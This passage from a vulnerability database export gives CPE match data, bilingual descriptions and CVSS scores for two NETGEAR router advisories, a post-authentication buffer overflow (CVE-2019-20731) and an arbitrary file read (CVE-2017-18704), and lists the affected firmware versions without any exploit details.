"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B0BCDB34-EC1F-43A1-AA7D-BF4CA1F4C168",
"versionEndExcluding": "1.0.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FF0010-66E3-485C-A22B-39E57E738550",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5352DD0A-3388-423C-B6E3-38FFF8B4700F",
"versionEndExcluding": "1.0.9.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0CB1E644-FB4B-443B-B9D7-349F0024FB74",
"versionEndExcluding": "1.3.0.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EFFC911D-B2A3-47D7-940A-76978458CEA5",
"versionEndExcluding": "1.3.0.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2FB08FA1-A476-4E05-9904-9BE30C9E77B7",
"versionEndExcluding": "1.0.0.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "999A4F9A-D803-47D0-94F5-4626669D8DE0",
"versionEndExcluding": "1.0.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72C46066-B210-44BB-9219-14B2E8CCEF8E",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B19B770D-4660-4B12-8B5C-B689DA8CCB64",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2DDFF20-B761-4E45-9F16-CE15C82AAB5C",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7E4D2E75-1ADA-4ECE-B1B5-12E28913063E",
"versionEndExcluding": "1.0.2.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16C3369B-3E65-4CB7-BFF0-5052DBB16C45",
"versionEndExcluding": "1.0.2.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0675F6C4-EB61-4DA3-8473-448E93D5E0A5",
"versionEndExcluding": "1.0.1.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38BC0F78-4571-45E6-9023-CD1AEA7DF8EF",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.18, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.34, R7300DST before 1.0.0.62, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.54, and WNDR3400v3 before 1.0.1.18."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer por parte de un usuario autenticado. Esto afecta a D6220 versiones anteriores a 1.0.0.40, D6400 versiones anteriores a 1.0.0.74, D7000v2 versiones anteriores a 1.0.0.74, D8500 versiones anteriores a 1.0.3.39, EX3700 versiones anteriores a 1.0.0.70, EX3800 versiones anteriores a 1.0.0.70, EX6000 versiones anteriores a 1.0.0. 30, EX6100 versiones anteriores a 1.0.2.22, EX6120 versiones anteriores a 1.0.0.40, EX6130 versiones anteriores a 1.0.0.22, EX6150v1 versiones anteriores a 1.0.0.42, EX6200 versiones anteriores a 1.0.3.88, EX7000 versiones anteriores a 1.0.0.66, R6250 versiones anteriores a 1.0.4.20, R6300v2 versiones anteriores a 1.0.4. 18, R6400v2 versiones anteriores a 1.0.2.52, R6700 versiones anteriores a 1.0.1.44, R6900 versiones anteriores a 1.0.1.46, R7000 versiones anteriores a 1.0.9.26, R6900P versiones anteriores a 1.3.0.20, R7000P versiones anteriores a 1.3.0.20, R7100LG versiones anteriores a 1.0.0.34, R7300DST versiones anteriores a 1. 0.0.62, R8000 versiones anteriores a 1.0.4.12, R7900P versiones anteriores a 1.3.0.10, R8000P versiones anteriores a 1.3.0.10, R8300 versiones anteriores a 1.0.2.116, R8500 versiones anteriores a 1.0.2.116, WN2500RPv2 versiones anteriores a 1.0.1.54, y WNDR3400v3 versiones anteriores a 1.0.1.18."
}
],
"id": "CVE-2019-20731",
"lastModified": "2024-11-21T04:39:12.623",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L",
"version": "3.0"
},
"exploitabilityScore": 0.8,
"impactScore": 4.7,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T20:15:13.397",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061196/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2254"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061196/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2254"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-24 15:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by an attacker's ability to read arbitrary files. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.60, D8500 before 1.0.3.29, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R6900P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8500 before 1.0.2.106, R8300 before 1.0.2.106, and WNDR3400v3 before 1.0.1.16.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | d6220_firmware | * | |
| netgear | d6220 | - | |
| netgear | d6400_firmware | * | |
| netgear | d6400 | - | |
| netgear | d8500_firmware | * | |
| netgear | d8500 | - | |
| netgear | r6250_firmware | * | |
| netgear | r6250 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | - | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | v2 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r7000p_firmware | * | |
| netgear | r7000p | - | |
| netgear | r6900p_firmware | * | |
| netgear | r6900p | - | |
| netgear | r7100lg_firmware | * | |
| netgear | r7100lg | - | |
| netgear | r7300dst_firmware | * | |
| netgear | r7300dst | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - | |
| netgear | r8300_firmware | * | |
| netgear | r8300 | - | |
| netgear | wndr3400_firmware | * | |
| netgear | wndr3400 | v3 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1FD6552E-5BF6-4E57-90A7-39C4543B469C",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2D1F0B30-4BB4-4573-BE0D-381B31CD2A36",
"versionEndExcluding": "1.0.0.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "20564DE0-E58D-4628-ADD6-AC7C90AD85F7",
"versionEndExcluding": "1.0.3.29",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F5E7A8CA-134F-49B4-95D6-79A88CD6BB80",
"versionEndExcluding": "1.0.4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "55058831-92FF-4A87-8340-E25AC0DDF89E",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54D9B854-7E18-439E-8FD2-C0EC88DA6222",
"versionEndExcluding": "1.01.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DDC0DA75-5EB9-4F53-99A9-798FFBFD0C15",
"versionEndExcluding": "1.0.2.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "442F153C-737B-44D4-9A6D-EB6F6C47B986",
"versionEndExcluding": "1.0.1.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "81F70E0C-3674-4981-B815-0721F6C6E588",
"versionEndExcluding": "1.0.1.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CDE61DB5-86A6-4810-91CC-18D05DC09507",
"versionEndExcluding": "1.0.9.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09963BE1-D57D-491A-9BD8-A1A46ED993E0",
"versionEndExcluding": "1.3.0.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "326BBECA-9A76-4A3E-90F7-023797D5D186",
"versionEndExcluding": "1.3.0.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2FB08FA1-A476-4E05-9904-9BE30C9E77B7",
"versionEndExcluding": "1.0.0.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F7508FAE-C117-4E21-8D3D-0016E25363DB",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0B72579C-51F1-4F16-8FDE-544229C25B07",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "78819A69-AF43-4741-AE4D-5FEC4280F25F",
"versionEndExcluding": "1.0.4.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4DFD7557-D13D-40EB-94AD-AF092CDE587A",
"versionEndExcluding": "1.0.2.106",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE9CF95-192E-4D43-9DAD-2C8D9AF045E9",
"versionEndExcluding": "1.0.2.106",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72DCD4C0-A757-4F98-97BD-FB1FEBF3235C",
"versionEndExcluding": "1.0.1.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by an attacker\u0027s ability to read arbitrary files. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.60, D8500 before 1.0.3.29, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R6900P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8500 before 1.0.2.106, R8300 before 1.0.2.106, and WNDR3400v3 before 1.0.1.16."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una capacidad del atacante para leer archivos arbitrarios. Esto afecta a D6220 versiones anteriores a 1.0.0.32, D6400 versiones anteriores a 1.0.0.60, D8500 versiones anteriores a 1.0.3.29, R6250 versiones anteriores a 1.0.4.16, R6300v2 versiones anteriores a 1.0.4.18, R6400 versiones anteriores a 1.01.32, R6400v2 versiones anteriores a 1.0.2.44, R6700 versiones anteriores a 1.0.1.36, R6900 versiones anteriores a 1.0.1.34, R7000 versiones anteriores a 1.0.9.14, R7000P versiones anteriores a 1.3.0.8, R6900P versiones anteriores a 1.3.0.8, R7100LG versiones anteriores a 1.0.0.34, R7300DST versiones anteriores a 1.0.0.56, R7900 versiones anteriores a 1.0.1.26, R8000 versiones anteriores a 1.0.4.4, R8500 versiones anteriores a 1.0.2.106, R8300 versiones anteriores a 1.0.2.106 y WNDR3400v3 versiones anteriores a 1.0.1.16."
}
],
"id": "CVE-2017-18704",
"lastModified": "2024-11-21T03:20:42.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
